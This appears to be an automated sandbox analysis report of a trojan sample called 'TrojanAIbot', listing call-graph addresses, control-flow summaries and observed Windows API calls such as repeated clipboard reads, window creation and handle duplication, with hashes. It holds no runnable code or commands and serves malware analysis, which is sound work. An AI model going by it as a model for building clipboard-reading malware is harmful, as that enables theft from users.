65b971e 31599->31600 31601 65b6890 8 API calls 31599->31601 31601->31600 31608 65bd528 31609 65bd56a 31608->31609 31610 65bd570 SetWindowTextW 31608->31610 31609->31610 31611 65bd5a1 31610->31611 31612 65b03e8 31613 65b0410 31612->31613 31614 65b0438 31613->31614 31617 65b0480 31613->31617 31625 65b0498 31613->31625 31614->31614 31618 65b04a7 31617->31618 31633 65b15b0 31618->31633 31639 65b15a0 31618->31639 31619 65b04d0 31623 65b2208 8 API calls 31619->31623 31645 65b21f0 31619->31645 31620 65b04e1 31620->31614 31623->31620 31626 65b04a7 31625->31626 31631 65b15b0 3 API calls 31626->31631 31632 65b15a0 3 API calls 31626->31632 31627 65b04d0 31629 65b2208 8 API calls 31627->31629 31630 65b21f0 8 API calls 31627->31630 31628 65b04e1 31628->31614 31629->31628 31630->31628 31631->31627 31632->31627 31635 65b15cc 31633->31635 31634 65b161c 31634->31619 31636 65b1621 31635->31636 31637 65b16c0 2 API calls 31635->31637 31638 65b16b0 2 API calls 31635->31638 31636->31619 31637->31634 31638->31634 31640 65b15cc 31639->31640 31642 65b1621 31640->31642 31643 65b16c0 2 API calls 31640->31643 31644 65b16b0 2 API calls 31640->31644 31641 65b161c 31641->31619 31642->31619 31643->31641 31644->31641 31646 65b21e4 31645->31646 31649 65b21fa 31645->31649 31646->31620 31647 65b2245 31647->31620 31648 65b233a 31653 65b19f0 8 API calls 31648->31653 31649->31647 31651 65b2f38 CreateWindowExW 31649->31651 31652 65b2f27 CreateWindowExW 31649->31652 31651->31648 31652->31648 31653->31647 31291 158d01c 31292 158d034 31291->31292 31293 158d08e 31292->31293 31300 65b415e 31292->31300 31304 65b4028 31292->31304 31310 65b4d79 31292->31310 31318 65b4017 31292->31318 31324 65b1b5c 31292->31324 31328 65b1b6c 31292->31328 31301 65b4160 31300->31301 31336 65b1b94 31301->31336 31303 65b4167 31303->31293 31305 65b404e 31304->31305 31306 65b1b5c SetWindowLongW 31305->31306 31307 65b405a 31306->31307 31308 65b1b6c 2 API calls 31307->31308 31309 65b406f 31308->31309 31309->31293 31312 65b4db5 31310->31312 31311 65b4de9 31315 65b4de7 31311->31315 31351 65b1c94 31311->31351 31312->31311 31314 65b4dd9 31312->31314 31340 65b4f10 31314->31340 31345 65b4f00 31314->31345 31319 65b404e 31318->31319 31320 65b1b5c SetWindowLongW 31319->31320 31321 65b405a 31320->31321 31322 65b1b6c 2 API calls 31321->31322 31323 65b406f 31322->31323 31323->31293 31325 65b1b67 31324->31325 31326 65b1b94 SetWindowLongW 31325->31326 31327 65b4167 31326->31327 31327->31293 31329 65b1b77 31328->31329 31330 65b4de9 31329->31330 31332 65b4dd9 31329->31332 31331 65b1c94 2 API calls 31330->31331 31333 65b4de7 31330->31333 31331->31333 31334 65b4f10 2 API calls 31332->31334 31335 65b4f00 2 API calls 31332->31335 31334->31333 31335->31333 31338 65b1b9f 31336->31338 31337 65b43f6 31338->31337 31339 65b4088 SetWindowLongW 31338->31339 31339->31337 31341 65b4f24 31340->31341 31358 65b4fc8 31341->31358 31363 65b4fb9 31341->31363 31342 65b4fb0 31342->31315 31346 65b4ee7 31345->31346 31348 65b4f0e 31345->31348 31346->31315 31347 65b4fb0 31347->31315 31349 65b4fb9 2 API calls 31348->31349 31350 65b4fc8 2 API calls 31348->31350 31349->31347 31350->31347 31352 65b1c9f 31351->31352 31353 65b669c 31352->31353 31354 65b65f2 31352->31354 31356 65b1b6c OleGetClipboard 31353->31356 31355 65b664a CallWindowProcW 31354->31355 31357 65b65f9 31354->31357 31355->31357 31356->31357 31357->31315 31359 65b4fd9 31358->31359 31369 65bba40 31358->31369 31377 65b64c4 31358->31377 31382 65bba30 31358->31382 31359->31342 31364 65b4fc8 31363->31364 31365 65b4fd9 31364->31365 31366 65bba40 2 API calls 31364->31366 31367 65bba30 2 API calls 31364->31367 31368 65b64c4 2 API calls 31364->31368 31365->31342 31366->31365 31367->31365 31368->31365 31370 65bba73 31369->31370 31390 65bbd50 31370->31390 31398 65bbd40 31370->31398 31371 65bbad8 31372 65bbafe 31371->31372 31406 6634189 31371->31406 31413 6634198 31371->31413 31372->31359 31378 65b64ce 31377->31378 31379 65b1c94 2 API calls 31378->31379 31381 65b6531 31378->31381 31380 65b659a 31379->31380 31380->31359 31381->31359 31383 65bba35 31382->31383 31388 65bbd50 2 API calls 31383->31388 31389 65bbd40 2 API calls 31383->31389 31384 65bbad8 31385 65bbafe 31384->31385 31386 6634189 OleGetClipboard 31384->31386 31387 6634198 OleGetClipboard 31384->31387 31385->31359 31386->31385 31387->31385 31388->31384 31389->31384 31391 65bbd69 31390->31391 31394 65bbd7c 31390->31394 31392 65bbf9a 31391->31392 31391->31394 31419 65bb710 31392->31419 31395 65bbeb6 31394->31395 31423 65bc340 31394->31423 31428 65bc312 31394->31428 31395->31371 31399 65bbd4b 31398->31399 31400 65bbd7c 31398->31400 31399->31400 31401 65bbf9a 31399->31401 31403 65bbeb6 31400->31403 31404 65bc312 2 API calls 31400->31404 31405 65bc340 2 API calls 31400->31405 31402 65bb710 2 API calls 31401->31402 31402->31403 31403->31371 31404->31403 31405->31403 31407 6634192 31406->31407 31408 663414b 31406->31408 31409 66341b3 31407->31409 31452 66345d1 31407->31452 31463 66345e0 31407->31463 31408->31372 31409->31372 31410 66341c9 31410->31372 31415 66341a0 31413->31415 31414 66341b3 31414->31372 31415->31414 31417 66345d1 OleGetClipboard 31415->31417 31418 66345e0 OleGetClipboard 31415->31418 31416 66341c9 31416->31372 31417->31416 31418->31416 31420 65bb71b 31419->31420 31421 65bc340 2 API calls 31420->31421 31422 65bc556 31421->31422 31422->31395 31424 65bc352 31423->31424 31425 65bc34b 31423->31425 31426 65bc358 31424->31426 31433 65bc377 31424->31433 31425->31395 31426->31395 31429 65bc33b 31428->31429 31430 65bc397 31428->31430 31431 65bc34b 31429->31431 31432 65bc377 2 API calls 31429->31432 31430->31395 31431->31395 31432->31431 31434 65bc396 31433->31434 31435 65bc385 31433->31435 31434->31426 31436 65bc38c 31435->31436 31439 65b5980 31435->31439 31436->31426 31438 65bc3c8 31438->31426 31441 65b59cc 31439->31441 31440 65b5a1d 31440->31438 31441->31440 31444 65bc3d0 31441->31444 31448 65bc3e0 31441->31448 31445 65bc426 31444->31445 31446 65b1c94 2 API calls 31445->31446 31447 65bc449 31445->31447 31446->31447 31447->31440 31449 65bc426 31448->31449 31450 65b1c94 2 API calls 31449->31450 31451 65bc449 31449->31451 31450->31451 31451->31440 31453 66345f2 31452->31453 31454 663460d 31453->31454 31456 6634639 31453->31456 31461 66345d1 OleGetClipboard 31454->31461 31462 66345e0 OleGetClipboard 31454->31462 31455 6634613 31455->31410 31458 66346b9 31456->31458 31474 6634791 31456->31474 31478 66347a0 31456->31478 31457 66346d7 31457->31410 31458->31410 31461->31455 31462->31455 31464 66345f2 31463->31464 31465 663460d 31464->31465 31467 6634639 31464->31467 31472 66345d1 OleGetClipboard 31465->31472 31473 66345e0 OleGetClipboard 31465->31473 31466 6634613 31466->31410 31469 66346b9 31467->31469 31470 6634791 OleGetClipboard 31467->31470 31471 66347a0 OleGetClipboard 31467->31471 31468 66346d7 31468->31410 31469->31410 31470->31468 31471->31468 31472->31466 31473->31466 31476 66347b5 31474->31476 31477 66347db 31476->31477 31482 66324cc 31476->31482 31477->31457 31480 66347b5 31478->31480 31479 66324cc OleGetClipboard 31479->31480 31480->31479 31481 66347db 31480->31481 31481->31457 31483 6634848 OleGetClipboard 31482->31483 31485 66348e2 31483->31485 31486 2f7d330 31489 2f7d418 31486->31489 31487 2f7d33f 31490 2f7d439 31489->31490 31491 2f7d45c 31489->31491 31490->31491 31492 2f7d660 GetModuleHandleW 31490->31492 31491->31487 31493 2f7d68d 31492->31493 31493->31487 31602 65b800c 31603 65b8015 31602->31603 31605 65b8033 31602->31605 31604 65b6890 8 API calls 31603->31604 31603->31605 31604->31605 31606 65b6890 8 API calls 31605->31606 31607 65b816c 31605->31607 31606->31607 31654 2f7f6c0 31655 2f7f706 31654->31655 31659 2f7fca8 31655->31659 31662 2f7fc98 31655->31662 31656 2f7f7f3 31666 2f7e1a0 31659->31666 31663 2f7fca8 31662->31663 31664 2f7e1a0 DuplicateHandle 31663->31664 31665 2f7fcd6 31664->31665 31665->31656 31667 2f7fd10 DuplicateHandle 31666->31667 31668 2f7fcd6 31667->31668 31668->31656 31494 2f75238 31495 2f7524f 31494->31495 31501 2f74e0c 31495->31501 31497 2f752be 31506 66316b8 31497->31506 31510 6631660 31497->31510 31502 2f74e17 31501->31502 31505 65b6890 8 API calls 31502->31505 31514 65b688a 31502->31514 31503 2f77abe 31503->31497 31505->31503 31507 66316c7 31506->31507 31519 66312f4 31507->31519 31511 6631665 31510->31511 31512 66312f4 2 API calls 31511->31512 31513 2f752c5 31512->31513 31515 65b688e 31514->31515 31516 65b68dd 31515->31516 31517 65badd9 8 API calls 31515->31517 31518 65bade8 8 API calls 31515->31518 31516->31503 31517->31516 31518->31516 31520 66312ff 31519->31520 31523 6631334 31520->31523 31522 66317ad 31524 663133f 31523->31524 31525 6631a28 31524->31525 31526 66315a8 OleInitialize 31524->31526 31529 6631a53 31524->31529 31525->31529 31532 66315a8 31525->31532 31526->31525 31528 6631a40 31536 6633350 31528->31536 31540 6633360 31528->31540 31529->31522 31533 66315b3 31532->31533 31535 6632df9 31533->31535 31544 6632194 31533->31544 31535->31528 31538 66333c5 31536->31538 31539 6633412 31538->31539 31551 663225c 31538->31551 31539->31529 31542 66333c5 31540->31542 31541 663225c DispatchMessageW 31541->31542 31542->31541 31543 6633412 31542->31543 31543->31529 31546 663219f 31544->31546 31545 6633113 31545->31535 31546->31545 31548 66321b0 31546->31548 31549 6633148 OleInitialize 31548->31549 31550 66331ac 31549->31550 31550->31545 31552 66340c8 DispatchMessageW 31551->31552 31553 6634134 31552->31553 31553->31538

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 717 65b16c0-65b16d9 718 65b16df-65b16e3 717->718 719 65b175c-65b175f 717->719 720 65b1760-65b17ce 718->720 721 65b16e5-65b16ff 718->721 741 65b1888-65b188d 720->741 742 65b17d4-65b17fa 720->742 726 65b1713-65b1735 721->726 727 65b1701-65b1708 721->727 734 65b173c-65b173e 726->734 727->726 729 65b170a-65b170c 727->729 729->726 735 65b1740-65b174c 734->735 736 65b1755 734->736 735->736 740 65b174e 735->740 736->719 740->736 746 65b180a-65b180f 742->746 747 65b17fc-65b1807 742->747 748 65b1818-65b1820 746->748 749 65b1811 746->749 747->746 750 65b1822-65b183b 748->750 751 65b1845-65b187e KiUserCallbackDispatcher 748->751 755 65b1813 call 6630ac9 749->755 756 65b1813 call 6630ad8 749->756 750->751 757 65b1883 call 6630ea0 751->757 758 65b1883 call 6630eb0 751->758 755->748 756->748 757->741 758->741
                                                                                                                  APIs
                                                                                                                  • KiUserCallbackDispatcher.NTDLL(00000037,00000000,00000000,04184164,031BE230,?,00000000,?,00000000,00000000), ref: 065B1877
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000F.00000002.4545392218.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_15_2_65b0000_TrojanAIbot.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                                  • String ID: Haq
                                                                                                                  • API String ID: 2492992576-725504367
                                                                                                                  • Opcode ID: 2e4cb53a416fa9921ba2342c353925c9b9aba39a8f70592c3b165d5a5cae71d5
                                                                                                                  • Instruction ID: 4bea4c2647550d4baccd89a9f9f3cdeb941627c6b936246e4e1ae241b556385f
                                                                                                                  • Opcode Fuzzy Hash: 2e4cb53a416fa9921ba2342c353925c9b9aba39a8f70592c3b165d5a5cae71d5
                                                                                                                  • Instruction Fuzzy Hash: AF51AA34700A118FD7A8EB28D864B2E77E7BFC5650B14856AE406CB7A1CF74EC02CB90

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 786 2f7d418-2f7d437 787 2f7d463-2f7d467 786->787 788 2f7d439-2f7d446 call 2f7c720 786->788 790 2f7d47b-2f7d4bc 787->790 791 2f7d469-2f7d473 787->791 794 2f7d45c 788->794 795 2f7d448 788->795 797 2f7d4be-2f7d4c6 790->797 798 2f7d4c9-2f7d4d7 790->798 791->790 794->787 841 2f7d44e call 2f7d6c0 795->841 842 2f7d44e call 2f7d6b0 795->842 797->798 799 2f7d4fb-2f7d4fd 798->799 800 2f7d4d9-2f7d4de 798->800 805 2f7d500-2f7d507 799->805 802 2f7d4e0-2f7d4e7 call 2f7c72c 800->802 803 2f7d4e9 800->803 801 2f7d454-2f7d456 801->794 804 2f7d598-2f7d658 801->804 807 2f7d4eb-2f7d4f9 802->807 803->807 836 2f7d660-2f7d68b GetModuleHandleW 804->836 837 2f7d65a-2f7d65d 804->837 808 2f7d514-2f7d51b 805->808 809 2f7d509-2f7d511 805->809 807->805 812 2f7d51d-2f7d525 808->812 813 2f7d528-2f7d531 call 2f7c73c 808->813 809->808 812->813 817 2f7d533-2f7d53b 813->817 818 2f7d53e-2f7d543 813->818 817->818 819 2f7d545-2f7d54c 818->819 820 2f7d561-2f7d56e 818->820 819->820 822 2f7d54e-2f7d55e call 2f7c74c call 2f7c75c 819->822 827 2f7d591-2f7d597 820->827 828 2f7d570-2f7d58e 820->828 822->820 828->827 838 2f7d694-2f7d6a8 836->838 839 2f7d68d-2f7d693 836->839 837->836 839->838 841->801 842->801
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 02F7D67E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000F.00000002.4533326925.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_15_2_2f70000_TrojanAIbot.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4139908857-0
                                                                                                                  • Opcode ID: 15ab7dcd55ed12fcea40a3e6616ddf7207237be97061fb58808169d1a49248d4
                                                                                                                  • Instruction ID: ec6e5446fad126e1556efe2580e4d32459c0ddc215d634d28e009a3eb205d161
                                                                                                                  • Opcode Fuzzy Hash: 15ab7dcd55ed12fcea40a3e6616ddf7207237be97061fb58808169d1a49248d4
                                                                                                                  • Instruction Fuzzy Hash: EA813370A00B458FDB24DF29D44479ABBF2FF88344F008A2ED58A9BA40DB74E945CF90

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 843 65b3e64-65b3ed6 844 65b3ed8-65b3ede 843->844 845 65b3ee1-65b3ee8 843->845 844->845 846 65b3eea-65b3ef0 845->846 847 65b3ef3-65b3f2b 845->847 846->847 848 65b3f33-65b3f92 CreateWindowExW 847->848 849 65b3f9b-65b3fd3 848->849 850 65b3f94-65b3f9a 848->850 854 65b3fe0 849->854 855 65b3fd5-65b3fd8 849->855 850->849 856 65b3fe1 854->856 855->854 856->856
                                                                                                                  APIs
                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 065B3F82
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000F.00000002.4545392218.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_15_2_65b0000_TrojanAIbot.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 716092398-0
                                                                                                                  • Opcode ID: 952ab8d2e9357b9cf4f0e49e2b3bb2a6c529df86e2ed76f02e8b024dcf3e3666
                                                                                                                  • Instruction ID: d80a04e5fdb95cc6cdb90ea0c4a651a08a6f6f265c4ef59e0840b7e6bb13a778
                                                                                                                  • Opcode Fuzzy Hash: 952ab8d2e9357b9cf4f0e49e2b3bb2a6c529df86e2ed76f02e8b024dcf3e3666
                                                                                                                  • Instruction Fuzzy Hash: 4751C0B1D10319DFDB14CF99C884ADEBBB5BF48300F24812AE819BB250D775A945CF91

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 857 65b1b40-65b3ed6 859 65b3ed8-65b3ede 857->859 860 65b3ee1-65b3ee8 857->860 859->860 861 65b3eea-65b3ef0 860->861 862 65b3ef3-65b3f92 CreateWindowExW 860->862 861->862 864 65b3f9b-65b3fd3 862->864 865 65b3f94-65b3f9a 862->865 869 65b3fe0 864->869 870 65b3fd5-65b3fd8 864->870 865->864 871 65b3fe1 869->871 870->869 871->871
                                                                                                                  APIs
                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 065B3F82
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000F.00000002.4545392218.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_15_2_65b0000_TrojanAIbot.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 716092398-0
                                                                                                                  • Opcode ID: 94154b15849da00799e3eabae90d87adaf08673dd8da7f06efc9fca0a57c9605
                                                                                                                  • Instruction ID: 7181e24eabc3306b977d17074ed980666b5d6a99c72b980c3a60b8fbbe29e3b1
                                                                                                                  • Opcode Fuzzy Hash: 94154b15849da00799e3eabae90d87adaf08673dd8da7f06efc9fca0a57c9605
                                                                                                                  • Instruction Fuzzy Hash: 8851DFB1D10349EFDB14CF99C884ADEBBB5FF48300F24812AE819AB210D775A985CF91

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 872 65b1c94-65b65ec 875 65b669c-65b66bc call 65b1b6c 872->875 876 65b65f2-65b65f7 872->876 883 65b66bf-65b66cc 875->883 877 65b664a-65b6682 CallWindowProcW 876->877 878 65b65f9-65b6630 876->878 880 65b668b-65b669a 877->880 881 65b6684-65b668a 877->881 886 65b6639-65b6648 878->886 887 65b6632-65b6638 878->887 880->883 881->880 886->883 887->886
                                                                                                                  APIs
                                                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 065B6671
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000F.00000002.4545392218.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_15_2_65b0000_TrojanAIbot.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CallProcWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2714655100-0
                                                                                                                  • Opcode ID: 190d8e903377a0867853f49159f50e8950e2529366e5b74a40d4790321e5bcb8
                                                                                                                  • Instruction ID: d8cfb9b438916b1e6c72b28c37cb163decfbba1966815e8f5c4427494fbf045d
                                                                                                                  • Opcode Fuzzy Hash: 190d8e903377a0867853f49159f50e8950e2529366e5b74a40d4790321e5bcb8
                                                                                                                  • Instruction Fuzzy Hash: 934156B4900309CFCB54CF99C888AAABBF5FF88314F24C459E419AB321D770A841CFA0

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 889 65bf8a8-65bf8bd call 65be41c 891 65bf8bf-65bf8cd 889->891 893 65bf8cf-65bf8df call 65bf368 891->893 894 65bf8e2-65bf8f4 891->894 894->891 898 65bf8f6-65bf974 CreateIconFromResourceEx 894->898 899 65bf97d-65bf99a 898->899 900 65bf976-65bf97c 898->900 900->899
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000F.00000002.4545392218.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_15_2_65b0000_TrojanAIbot.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFromIconResource
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3668623891-0
                                                                                                                  • Opcode ID: f0a5e7dac192061770902eead9ad3147fb0f7ebf208646d13bf82ae8f53c89bf
                                                                                                                  • Instruction ID: e594bbc1e5a41c0cde88d796389ce7612c8451bd71f0b834f6378e8dd821dab2
                                                                                                                  • Opcode Fuzzy Hash: f0a5e7dac192061770902eead9ad3147fb0f7ebf208646d13bf82ae8f53c89bf
                                                                                                                  • Instruction Fuzzy Hash: 6E315672904259AFCB11CFAAD840AEABFF8FF49310F14805AE958A7251C3359854DFA1

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 903 663483c-6634898 904 66348a2-66348e0 OleGetClipboard 903->904 905 66348e2-66348e8 904->905 906 66348e9-66348fa 904->906 905->906 908 6634904-6634937 906->908 911 6634947 908->911 912 6634939-663493d 908->912 914 6634948 911->914 912->911 913 663493f 912->913 913->911 914->914
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000F.00000002.4546393435.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_15_2_6630000_TrojanAIbot.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Clipboard
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 220874293-0
                                                                                                                  • Opcode ID: adf89d4f3febe431ecaf6df9dbae40a6074ae8fbb32cc767849deac6c15f2c15
                                                                                                                  • Instruction ID: 15dc3821225ddf8298d91b8ef1118b27fa0c3bf663bef3739a170f174e12af99
                                                                                                                  • Opcode Fuzzy Hash: adf89d4f3febe431ecaf6df9dbae40a6074ae8fbb32cc767849deac6c15f2c15
                                                                                                                  • Instruction Fuzzy Hash: 8B3111B0D01219DFDB50CF99C984BCDBBF5AF08314F208029E404AB390DB74A949CF95

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 915 66324cc-66348e0 OleGetClipboard 918 66348e2-66348e8 915->918 919 66348e9-66348fa 915->919 918->919 921 6634904-6634937 919->921 924 6634947 921->924 925 6634939-663493d 921->925 927 6634948 924->927 925->924 926 663493f 925->926 926->924 927->927
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000F.00000002.4546393435.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_15_2_6630000_TrojanAIbot.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Clipboard
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 220874293-0
                                                                                                                  • Opcode ID: 2c28d52b156d1bb2606226b9d8fe1cfcd8225f5ad5f52ef5d5a87f3fa1b5d6c8
                                                                                                                  • Instruction ID: d0388537d05e6f4a80d8cd7fc51bac1877c053257dd8ed23d928d219bf59078d
                                                                                                                  • Opcode Fuzzy Hash: 2c28d52b156d1bb2606226b9d8fe1cfcd8225f5ad5f52ef5d5a87f3fa1b5d6c8
                                                                                                                  • Instruction Fuzzy Hash: 37310FB0D01258EFDB50CF99C984B9EBBF5AB48304F208069E409AB390DBB4A945CF95

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 928 2f7e1a0-2f7fda4 DuplicateHandle 930 2f7fda6-2f7fdac 928->930 931 2f7fdad-2f7fdca 928->931 930->931
                                                                                                                  APIs
                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02F7FCD6,?,?,?,?,?), ref: 02F7FD97
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000F.00000002.4533326925.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_15_2_2f70000_TrojanAIbot.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DuplicateHandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3793708945-0
                                                                                                                  • Opcode ID: c068e6f36925cbed4c4b50f219802e04804a08762c0012398fd24fbb6f86c1fa
                                                                                                                  • Instruction ID: 9a5ebecf2833e381210d525a4ee3c2a295dd69affe84d1803af0b5b3ac272b2a
                                                                                                                  • Opcode Fuzzy Hash: c068e6f36925cbed4c4b50f219802e04804a08762c0012398fd24fbb6f86c1fa
                                                                                                                  • Instruction Fuzzy Hash: B821E4B5D00249AFDB10CFAAD584ADEBFF8FB48310F14845AE919A3310D374A954CFA5

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 934 2f7fd0a-2f7fda4 DuplicateHandle 935 2f7fda6-2f7fdac 934->935 936 2f7fdad-2f7fdca 934->936 935->936
                                                                                                                  APIs
                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02F7FCD6,?,?,?,?,?), ref: 02F7FD97
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000F.00000002.4533326925.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_15_2_2f70000_TrojanAIbot.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DuplicateHandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3793708945-0
                                                                                                                  • Opcode ID: cdb3f18486973af6a9aaa9c21e4aeee7147154b64316966af4cad6031a621595
                                                                                                                  • Instruction ID: 139c827e4ca0be3c3e85e0d5a85da05e37cb64e0cf0dc5c30e5c01ffa3045046
                                                                                                                  • Opcode Fuzzy Hash: cdb3f18486973af6a9aaa9c21e4aeee7147154b64316966af4cad6031a621595
                                                                                                                  • Instruction Fuzzy Hash: AF21E4B5D00209DFDB10CFA9D984ADEBBF9FB48310F14845AE918A7310D374AA54CFA5
                                                                                                                  APIs
                                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 065BD592
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000F.00000002.4545392218.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_15_2_65b0000_TrojanAIbot.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: TextWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 530164218-0
                                                                                                                  • Opcode ID: c26c894efb55dc26153ee32f795b7f8acf5ab623cf5b009b87fb5ec3670da628
                                                                                                                  • Instruction ID: f57b61b8091c29219245f8be3b467b89fd042c2ce1af8885a67d75cdaa3f643a
                                                                                                                  • Opcode Fuzzy Hash: c26c894efb55dc26153ee32f795b7f8acf5ab623cf5b009b87fb5ec3670da628
                                                                                                                  • Instruction Fuzzy Hash: 792135B6C002498FDB14CFAAC844ADAFFF4EF48310F14856AD458A7251D378A646CFA5
                                                                                                                  APIs
                                                                                                                  • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,065BF8C2,?,?,?,?,?), ref: 065BF967
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000F.00000002.4545392218.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_15_2_65b0000_TrojanAIbot.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFromIconResource
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3668623891-0
                                                                                                                  • Opcode ID: b77cac8307122c855f8995cd30c73d7e5e98d78c32e259b7be39cb6a99c89ffb
                                                                                                                  • Instruction ID: e5e36c3ddcdda28ccd7b7755b7ba319ef2bf57d8d0ffdef6bac679a327daa475
                                                                                                                  • Opcode Fuzzy Hash: b77cac8307122c855f8995cd30c73d7e5e98d78c32e259b7be39cb6a99c89ffb
                                                                                                                  • Instruction Fuzzy Hash: 011126B1900349AFDB10CFAAD844ADEBFF8FB48310F14841AE514A7210C375A954DFA5
                                                                                                                  APIs
                                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 065BD592
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000F.00000002.4545392218.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_15_2_65b0000_TrojanAIbot.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: TextWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 530164218-0
                                                                                                                  • Opcode ID: ccd84bb7e6d1732d5866945c4c359c8bc0ac5554bdef15549ef3685678879341
                                                                                                                  • Instruction ID: 2e33a9c4e3ec0887e7f7ad69936dc5fcc9606f62e01dcea0da0953cd0d084559
                                                                                                                  • Opcode Fuzzy Hash: ccd84bb7e6d1732d5866945c4c359c8bc0ac5554bdef15549ef3685678879341
